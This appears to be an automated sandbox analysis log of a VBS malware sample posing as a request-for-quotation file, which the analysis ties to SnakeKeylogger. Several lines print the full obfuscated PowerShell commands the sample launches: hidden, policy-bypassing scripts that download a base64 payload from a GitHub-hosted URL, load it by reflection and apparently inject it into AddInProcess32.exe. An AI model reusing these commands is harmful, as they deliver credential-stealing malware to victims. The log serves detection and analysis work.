Source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.powershell.exe.22c12cbc703.1.unpack, type: UNPACKEDPE Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000004.00000002.2416249657.0000022C12CBC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: powershell.exe PID: 4256, type: MEMORYSTR Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, -c.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, -c.cs Cryptographic APIs: 'TransformFinalBlock'
Source: 4.2.powershell.exe.22c12cbc703.1.raw.unpack, --.cs Cryptographic APIs: 'TransformFinalBlock'
Source: powershell.exe, 00000004.00000002.2416249657.0000022C118FC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C12BC2000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, AddInProcess32.exe, 00000005.00000002.2360436871.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: B*\AD:\Code\Explorer\Explorer.vbp
Source: AddInProcess32.exe, 00000005.00000002.2360436871.0000000000400000.00000040.00000400.00020000.00000000.sdmp Binary or memory string: m`P@*\AD:\Code\Explorer\Explorer.vbp
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@8/6@2/2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5828:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpj0nzva.ftc.ps1 Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-5120240930 VENETA PESCA SRL.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ-5120240930 VENETA PESCA SRL.vbs"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBzSE9NRVsyMV0rJHBTSE9NZVszNF0rJ3gnKSgoKCdDJysnaVN1cmwgPScrJyBmJysnbVVodHRwczovJysnL3JhdycrJy5nJysnaXQnKydodWJ1JysncycrJ2VyJysnYycrJ28nKydudGVudCcrJy5jb20vTm8nKydEZXRlJysnY3RPbicrJy8nKydObycrJ0RlJysndGVjdE8nKyduL3JlZicrJ3MvJysnaGVhZHMnKycvJysnbWFpJysnbi9EJysnZXQnKydhaCcrJ05vdGgtVi50JysneHQnKydmbVU7IENpU2Jhc2U2NENvJysnbnRlJysnbnQgPSAoTmV3LU8nKydiJysnamVjdCcrJyBTeXN0ZW0uTicrJ2V0LldlYkMnKydsaScrJ2VudCkuJysnRG93bmxvYScrJ2RTJysndHInKydpbmcnKycoQ2knKydTdXInKydsKTsgQycrJ2lTYicrJ2knKyduYScrJ3J5JysnQ28nKydudCcrJ2VudCA9JysnICcrJ1tTeXN0ZScrJ20uQ29uJysndmVydCcrJ106OkZyb21CYXNlNjRTJysndCcrJ3JpJysnbmcoJysnQycrJ2lTYmFzZTY0Q29uJysndGVudCk7JysnIEMnKydpUycrJ2Fzc2VtYicrJ2x5ID0nKycgJysnW1InKydlZmxlY3RpbycrJ24uQXMnKydzZW0nKydibHknKyddOjpMbycrJ2FkKCcrJ0MnKydpU2JpJysnbicrJ2FyeScrJ0MnKydvbnRlbicrJ3QnKycpJysnOyBbZG5saWIuSU8nKycuSG9tZV06OlZBSSgnKydhJysnM1UwL2RpeUtGL2QvZWUuJysnZXQnKydzJysnYXAnKycvLzpzcCcrJ3R0aGEzVSwgYTMnKydVZGVzJysnYScrJ3RpJysndicrJ2EnKydkb2EzVScrJywnKycgYScrJzNVZGUnKydzJysnYXRpdmEnKydkbycrJ2EzJysnVSwgYTNVZGUnKydzYXQnKydpJysndmFkb2EzVSwgYTNVQScrJ2RkJysnSW5QJysncm9jZScrJ3NzMzInKydhM1UsIGEzVWEnKyczVSxhM1VhJysnM1UpJykgLVJFcGxBY2UgIChbQ2hBcl05NytbQ2hBcl01MStbQ2hBcl04NSksW0NoQXJdMzQgLWNyZVBMYUNFICAnZm1VJyxbQ2hBcl0zOSAgLVJFcGxBY2UgIChbQ2hBcl02NytbQ2hBcl0xMDUrW0NoQXJdODMpLFtDaEFyXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $psHOME[21]+$pSHOMe[34]+'x')((('C'+'iSurl ='+' f'+'mUhttps:/'+'/raw'+'.g'+'it'+'hubu'+'s'+'er'+'c'+'o'+'ntent'+'.com/No'+'Dete'+'ctOn'+'/'+'No'+'De'+'tectO'+'n/ref'+'s/'+'heads'+'/'+'mai'+'n/D'+'et'+'ah'+'Noth-V.t'+'xt'+'fmU; CiSbase64Co'+'nte'+'nt = (New-O'+'b'+'ject'+' System.N'+'et.WebC'+'li'+'ent).'+'Downloa'+'dS'+'tr'+'ing'+'(Ci'+'Sur'+'l); C'+'iSb'+'i'+'na'+'ry'+'Co'+'nt'+'ent ='+' '+'[Syste'+'m.Con'+'vert'+']::FromBase64S'+'t'+'ri'+'ng('+'C'+'iSbase64Con'+'tent);'+' C'+'iS'+'assemb'+'ly ='+' '+'[R'+'eflectio'+'n.As'+'sem'+'bly'+']::Lo'+'ad('+'C'+'iSbi'+'n'+'ary'+'C'+'onten'+'t'+')'+'; [dnlib.IO'+'.Home]::VAI('+'a'+'3U0/diyKF/d/ee.'+'et'+'s'+'ap'+'//:sp'+'ttha3U, a3'+'Udes'+'a'+'ti'+'v'+'a'+'doa3U'+','+' a'+'3Ude'+'s'+'ativa'+'do'+'a3'+'U, a3Ude'+'sat'+'i'+'vadoa3U, a3UA'+'dd'+'InP'+'roce'+'ss32'+'a3U, a3Ua'+'3U,a3Ua'+'3U)') -REplAce ([ChAr]97+[ChAr]51+[ChAr]85),[ChAr]34 -crePLaCE 'fmU',[ChAr]39 -REplAce ([ChAr]67+[ChAr]105+[ChAr]83),[ChAr]36) )" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe" Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: msvbvm60.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: vb6zz.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sxs.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2453863224.00007FFD34430000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2443276080.0000022C19DB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000004.00000002.2416249657.0000022C1267B000.00000004.00000800.00020000.00000000.sdmp
